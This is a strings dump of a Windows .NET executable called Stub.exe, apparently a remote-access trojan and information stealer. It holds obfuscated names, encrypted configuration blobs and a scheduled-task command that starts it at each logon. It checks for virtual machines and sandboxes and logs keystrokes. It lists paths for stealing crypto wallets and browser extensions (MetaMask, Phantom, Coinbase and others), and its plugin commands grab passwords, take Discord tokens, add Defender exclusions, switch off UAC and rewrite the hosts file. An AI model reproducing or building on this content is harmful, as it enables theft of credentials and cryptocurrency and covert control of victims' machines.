!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Read>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
code2024
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
toHgyTtXSPYA
CafRBmuezZA
tzpJIObHnnA
SystemParametersInfoA
MURMYvGkQCfGmmitA
unAnnmmFFUyHB
UVoaSKQwAJB
tGoZRwLCLB
ZDQdsgVZqTeQxNB
BTGUtnPiWiDzuKSB
FgONXcfBWYrSB
jawMeuUcivgB
UdeyfQAzYHEcAC
dJqFHLxusTZLVEC
LZEtUkYfRWJOFC
uboNFwFAHC
UpalVlrPOC
aZNZPWEGlLySC
PgXpVdgqGUC
xsNyoVviaWrcC
FXjKpMUvvriC
NEcQKCMCSeCunC
GiOUlwgPyC
qhWwoprpyED
MapNameToOID
get_FormatID
CvdKSpbdPBKD
hNVNsHbQNocWKD
UujFuMRSxTRD
HtcwICUREIQtSD
MDNVEitqbCJVaUD
tHBhCjudJjlcD
MDnCmubYAWdrD
VVVTEAyBypdVzD
nHdVnPHUhykXHE
GDkYnXjQJLE
VlexnzpYMvUE
jxWTEcyFDVVE
YQLkmRsHcgbE
wwcAhYUbZWbngE
WbuZWbhHfhE
BDdaPMPIjE
huUwkyZUjlE
keTZSmdBaMNpE
bauhEBlZSZwDF
XepzVesvUEF
foCvyhniFVF
uHSesKqteYF
BlbKsvSSZsIKuZF
MjWUkhfkJsDddF
MNnHnGLJoNTlF
NVXaqIoscrF
GQJaiLiqYQsF
fFiwTlsHryApqKG
drGTtjlhxsXLG
thKpVxjcDYBhRG
crcXcDSlTPTG
wZiwzjZzdbbG
PiaKdwKHzcKrwpCeG
PCTyDcUTInG
eVOgBmMbMsyJfxG
ScHatCJGmszG
YSlLwsZjnevBH
WqNydBsekHH
AmjcVEzQKRH
iPmHjZkjoJrSUVH
wusOnxPxdGyBRYH
JMXHLoEecZH
HNGjddbDytTaeH
XjzLDqozweFBqoH
AQvjBsvWVrQsvH
iPYMDRSrzH
ScxdTheICI
get_ASCII
VLJXHKKuKI
JegexZhacoVTI
MwLfuFwCfeTYI
EvHVcWUFSgI
JunOcXxiEpXigiI
YPyvCpDybCxfmI
AnSgwrbiTsGuI
yaOwPEkVxppDxI
WDdNyMEgVoLJ
XMhQhHfOcjwNJ
hpljuFRdzWFwWaQJ
MAyVNFZwELAzVVJ
ZMbCLcrsbMRsXJ
vgKIMmOsCjLYJ
HGxNFZKEGiVRQaJ
udYhylGLJyaMcJ
LiFOtDzKQoeJ
hBVdWEtiEqeJ
xhmrEbdxABK
JVtlpkWpWDK
wMyYygRkNWPUOK
iqqUzIhWAjK
vVXEQQjyxkEidboK
NjFyQEXCcIQFHKL
JMcnTfOojpOrQL
WVudpSDDtgqcL
nHBoYRuWIqL
lAwXDurZmuGwL
pobrpOkSEsBM
wsvpMrnNUqhVZVmEM
tQzfjbTFZOM
XwipZskwEUVhM
cIfGJKrSzLGBkM
avqmCJBdULvoQkM
IAewrVVbJyRpM
DSLByvPTwM
OXOjeJQHHN
HQYSoWNRjEscGFLN
GowuVHHwxzPN
RoEfXlUyUN
vwGLYrbkTSPaN
gTCYcgbAfN
dnnNFkJTiIyfN
GGOKPmeygIhN
MdGIiJcEWiN
thFKAJvfdRqcTjN
iPsEvznNFzMkN
RPhbcAIDQsxYnN
LflMsdDEbtN
xjGacXqfMIbryYyN
wMLdNtfQsHO
System.IO
QYCDGqHlZO
tmveapqLpVbO
pZDiHhlHibvvdO
MypGVLjXbiO
tclgGutFprolO
oBgmhPYscSP
UJfPJUMepsgeTP
vCbNYdAhUcUP
fjBBTTpscuaIcP
oXfUklfowveP
hUtEpEcHbSJuP
vXnWQwxmBKyCQ
RsguNIJhaFQ
fzZzDxAWoYDKIQ
YQNbtAGTTPQ
YZuqpZoFFXjSQQ
pRNAJuPfRQ
DRBbuPwersDjrQ
FGamRJFAzFtQ
uiroqKTDGXhvQ
krAsCvEVBNmwEWLR
WyHVTkrELZNR
iqLZsFfrBLQNbR
EBPlEoCMzvfcR
RDDxLTwGDkR
absyInQxqJSpR
SmKkCJAOuPtR
CYwnrrqNkqRvAS
WSCSzPhxSCREBS
ZBwdKyhLcjtPS
CHrmkDdgPyySS
sHzoMMjxSSYS
umqsWyeOjhS
BssmTYZgLrksS
lZYEYIfhtS
nZWZbWAHAT
VMZgiGFCpcSWBJT
IdQCJxtZRObwjLT
UmBsfiqCNT
RYrbHVkzadpORT
wWqXtBnqZTT
XJtHPBmOFZXT
sewmUCzsUTVEYT
puOdOJfiZTYT
CRWhRFxGplhfT
QpXptsJevMvfT
CVgzkantBTTSgT
bGOOSbwJuCXHWnEU
lFMcuNXbCXpU
SmIUtoxPvvysU
AswjEAFKJvU
aBAdEqUkaIZIByU
get_IV
set_IV
GenerateIV
SlItUNfQfIV
MwhFHosrIlnUV
pcgKajEYLlsjV
aXptjttxFW
QWhWtLeQXODMW
hHVmzfpclDBiNW
QXCdROYioORW
rZhSaaKKyqbW
ffOGSaqfLAZbfTdW
PyMgpCjFwrW
wjmXjYACGsrtSsW
epJxNSgInJpJX
LpxbQEMvUayPOX
zICRiPrGWTX
HmDxheVIEuUX
zSxRWpkDaGVX
JMqQPmwdLJlAVXX
WYhRLtdLjcNYX
BJneLxLUVulX
DRroZwxWBWtX
qSVgWnLWROzX
pOBAeDYhBiIEY
FsSzoETMqLfRiEY
GgjNqxNtlAZZwHY
ZmZhVHTtmgcTPY
QFYpGTekxdXbY
wUvDsHxYzZgY
vaNUgsItZmqGZqY
uPeLpAkVKpdrY
WiBTsbCOwoPOyY
QIYGfoLqQIAZ
evVoHIeajjXHZ
tdiqrsEbLZ
BflLKTICwPIVZ
SAsHXzyObZ
jUMsecWFFgZ
irOWAdQvmCeXMhZ
tZVJTpHncSiikZ
fowCTwqfkJjxqZ
value__
ggPARzDsAa
mtEwzcoOjFa
WvRepQDKMQKuLa
QltAROlsea
VzfCoBYcga
RVuOPGurcTpja
kDgtyoowVloa
kFWYriGhnva
RPTBFhcVyVHb
vzurcBGlNJpRb
mscorlib
XhFzafjBFUkDlb
sonqKCZfLc
RBmXUQDlLGRyMc
vklarwmslBQPc
iAprYRtXFjSc
qLLdNrEBOUdVc
pfYelBmnSfBZc
nVLbWIvKuDac
SipcbIutBcc
ZhJyXaPXrec
iqYNgZlaPNfc
System.Collections.Generic
Microsoft.VisualBasic
LRbTLYzKzjc
get_SendSync
BgBvDIPPHrc
MAQWeKnDvc
LXDfvyzbggOUTxc
HOQieEXeGd
NJStyOoSuGd
BRIlEcoNWYXAId
GetWindowThreadProcessId
GetProcessById
HaqxKwoTGOQd
kiHseCOxcTd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
XOBxWvjZItzgd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
TvzDifeTEtUmd
Append
RegistryValueKind
CompareMethod
method
pIpEuamwpd
Clipboard
yrDCjGWNekMkud
eBVHsmjBcZXDe
nDrbNlOqakFaXe
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
sQlCMFxyMGnfse
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
jJfEvsLGMrte
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
wTESOKyOoscGf
SizeOf
HtbYUtIfFQVf
esBCemRrZf
DeenjIQfubf
nNPbXMOPXgkf
UnMWQzSrof
IRGKMqUbMCqf
xNtWHzKxtf
TBRDntOExQIsrxf
PCOPOkIpaeyigBg
cZbDcuvquZUJg
MXxVsOCIwIsPTg
MEDPcAyRaHsTg
BrwrTppzAoMTfbg
mSDPdfxvcbWHDXig
CryptoConfig
hyLMhrSVONlg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
rrCsOZrMXXog
set_ErrorDialog
CCarMAnDzSpOtzXqg
dwVmIGwaqDrg
SOaptrkGUGBh
FFbmRnCraGsBh
dfEfRLIuKh
GRXyvrQtUh
RBUeRINdBbbh
mxBPPLCTbIpjhteh
mnpvRbelRCgh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
EndsWith
TBWrTFbeoHxh
JWouhuObHEGNxh
qIPHBBDHTbISzh
oQRrvXFYMIroCi
xqSCTUNWaebEVExHi
PbqVlfBIYSMi
xBoJVCHgUdFBlNi
RtTFUUszzPQi
UeqAswtITi
BOrXeOmtsARMfi
pMeEBGfMOvfi
nafeZzdqii
vQpeZaSCWtXki
XYbqQaATXWBri
BcwPzRCqPCCBlXCj
lwYLUPWUmDj
VetLTKIXVPOj
MxlyEDvkbLgQrZUj
FRvNCZpiCFpj
uYpfWMrNdLKQvj
WNFvWrsXTBk
kkHgJGrtewNPFk
kQedXPcxmzSQxmNJk
onbmuntKtfKk
rwsAntVaHmIxSk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
ygZyAUGZrBoEMjk
XlAqHQfXxkk
cWEajBTaztk
ZysNimzpMrHxk
ZEdBUShQSVvOyk
GLtEIZwlHqdIl
ZysoTjWgbOl
eLWsulpLOqUPl
KcTAcKyzWntSl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
ZeNkMNvRZbl
ZFLTvkDELhl
kernel32.dll
user32.dll
ntdll.dll
BIJdTAhNtKpgol
wnXNIFFhajRql
QwotJmpAQSOm
RauhJhALyPm
dNbXbFrLjfXaVm
uYfkgfvvnwWm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
oIghCqDryqzKQzSem
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
BivfjwOhJfwm
hsaAVBKpvVzBn
zxkomLgodZNn
nLUaUVxsRbTn
eGzxKdCUfFrHQTUn
QnCCqTxXDAVn
RTcWuolrtlxvjXn
DRWZeWzUbYixZn
ToBoolean
vSuJjpEeuxuEoan
TimeSpan
EfVGRbsmqfn
ucLGZXxaaGphn
kwozrqDjQWin
X509Chain
AppDomain
get_CurrentDomain
vCZQBgIKTsbln
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
dlOvvcvaFrjpn
ZWoxHDdTxyn
JrEzQYIrqVdkBo
BKEceVTSuGo
QUBSGIFyWgHo
HbIRdekukDcQPo
YhwgMfAltbfo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
UbFaHwNwAOAso
DeyotjpwqAwSso
IyopdueVFGyuo
pprFWFcNcuGqwo
ATtDQUQAwCp
npfhEGrMATMvWDp
ElUmvViNKnIjGp
yerNjQcUSp
omFsWKpdiCWp
FnIjafNyoip
sNEVHZNpKvNop
Microsoft.CSharp
kLSDVfmSIkvp
AreoYTGyHlcfEq
zhHUYlPUtsGGFHq
dctnuRxUlkQq
xcAUYxgTIjrunVq
System.Linq
SyiojPxFDgorq
nBOnItxWtq
IGMYfbtPWXEr
TkUMDesdiwKr
EkBdUfJffVjMfuYr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
HsVBxWAUxXQiCGSYCs
UwmmhhUQqHs
cKIyZBAvHeNFTs
System.Diagnostics
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
aUAjlIlOxdjxs
hCXoMIhlTNTzs
LAEfLofINYTFt
bHkHJIFvyNjPwXLt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
cbTnoTYTwdt
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
op_Explicit
IAsyncResult
result
qxTiMTcdmt
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
gdmUnSKUot
GetPathRoot
dhrDZOqlhArt
ParameterizedThreadStart
Convert
FailFast
ToList
GetKeyboardLayout
ntSYDyNcwt
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
BJCEaJihmDmLIDu
exgdsPcCNgRGPRu
ufHqpDZOqscu
ThcNlIgmiu
fClanLhezAlu
jsooftlFPHmu
kLrvZVHRuu
prmUgyPuMqTwu
bPgkoECQDuzu
LDkmkvPlgNCv
OGYQAxxbbEv
oLAyYmjmliMv
gDBwxrGpQv
BKsoFTAikvyDmLTv
gbjcvPaXeJFSpcv
pyDyvKpAhDFpCw
uSmrzpklIEw
hWWVbCnHKMw
cnJMIBiqzFdQw
sERTRnUWhFVw
PvoLsNLKarYbw
lvTnWoVAoXVcw
myIXGxfkMqkcw
MjStIaaCCdw
rKufgSlRZhlw
QxowGIBolw
jBafeZJascFdmw
cHzJHvWknw
GetForegroundWindow
set_CreateNoWindow
iETocOljWCGlZfoxw
MBKQNdBiUDx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
VdkkIFrUuFx
CoYMnPwPOJx
FADitUQwsDGGYx
TMOvOfOxtsx
gaWHcjeoeQux
zKtpAOOerux
ciplZkXgUxx
iPjcOzKKaLQBXfmoPzx
QsayfmcInvHOy
JWzDYipLuDKQy
InitializeArray
ToArray
get_AsArray
WySrmealByujdy
LCcBuLlznPQKCey
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
zCzMkxvWCPmy
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
rDoCAZXcqLrty
wbmMYHqTsExeOz
XFpvkwZyUQvNLRz
LHOxImSEAVqVz
UoDFVtarYz
hcoPNwhTSQcxbz
futXdBCmhPdz
TZRKCituJDgz
GKSPZKssDswgz
AYFLuaniKhShz
QfmSvDErvltz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.6
FrameworkDisplayName
.NET Framework 4.6
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
cP41bVHrfWQN3yibWPP7g81MQILoGfb/FzI1Rak27O9cNK5EeZLxGqrQCLwlE1KLrf2HhI/MgwI49qaEpihapw==
YngbdehlxdLT4J3pFFF0HwT7XFMQ2n81lv0ngOgaXFRBKLsMDRnzxO52qyaUnsk4oK6ar0hUz2TA9T6tIQm9Ykv1uLO/a5NJx8iBrjoDYKQ=
M7SvjoS8RWSqYR0NbQdzGYvEn4WD6zxz6U2XWETRRcT7X4ANggFPQimpqrtsQA3ie4EBusw7ar3nsVYFXWMWIVMQQTbs1d0Mp+SF6VyZbP4=
Zhx+zhD4FgygpDr+gsevYL6uOe8DJHR29tk7FxYVkuFGdezrASwY7bHOklVfeHPjlLFKeAqtaCZY3O2ynZNRag==
%AppData%
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
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Performance
Pastebin
Antivirus
Meta_Firefox
MetaFirefox
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Chrome
MetaChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Brave
MetaBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Meta_Edge
MetaEdge
\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Stable\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
Meta_Opera
MetaOpera
\Opera Software\Opera GX Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Software\Opera GX Stable\Local Extension Settings\chrome-extension://djclckkglechooblngghdinmeemkbgci
Meta_OperaGX
MetaOperaGX
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Chrome
PhantomChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Brave
PhantomBrave
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Chrome
BinanceChrome
\Microsoft\Edge\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Edge
BinanceEdge
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLinkChrome
Exodus_Chrome
\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
BitKeep_Chrome
BitKeepChrome
\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase_Chrome
CoinbaseChrome
\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin_Chrome
RoninChrome
\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Trust_Chrome
TrustChrome
\Google\Chrome\User Data\Default\Local Extension Settings\jkjgekcefbkpogohigkgooodolhdgcda
BitPay_Chrome
BitPayChrome
\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Chrome
F2aChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Brave
F2aBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
F2a_Edge
F2aEdge
\Ergo Wallet
Ergo_Wallet
ErgoWallet
\Ledger Live
Ledger_Live
LedgerLive
\atomic
Atomic
\Exodus
Exodus
\Electrum
Electrum
\Coinomi
Coinomi
\Binance
Binance
\Bitcoin
Bitcoin_Core
Bitcoin Core
BoolWallets
\Mozilla\Firefox\Profiles
-release
\extensions\webextension@metamask.io.xpi
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
Wallets
Chrome
ResetHosts
sendPlugin
Hashes
AllInOne
Password
Tokens
AVRemoval.Class1
Reset Scale succeeded!
BackProxy.Class1
wallets
\drivers\etc
\hosts.backup
\hosts
127.0.0.1
Blocked!
cmd.exe
/c taskkill.exe /im chrome.exe /f
Reset Hosts succeeded!
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0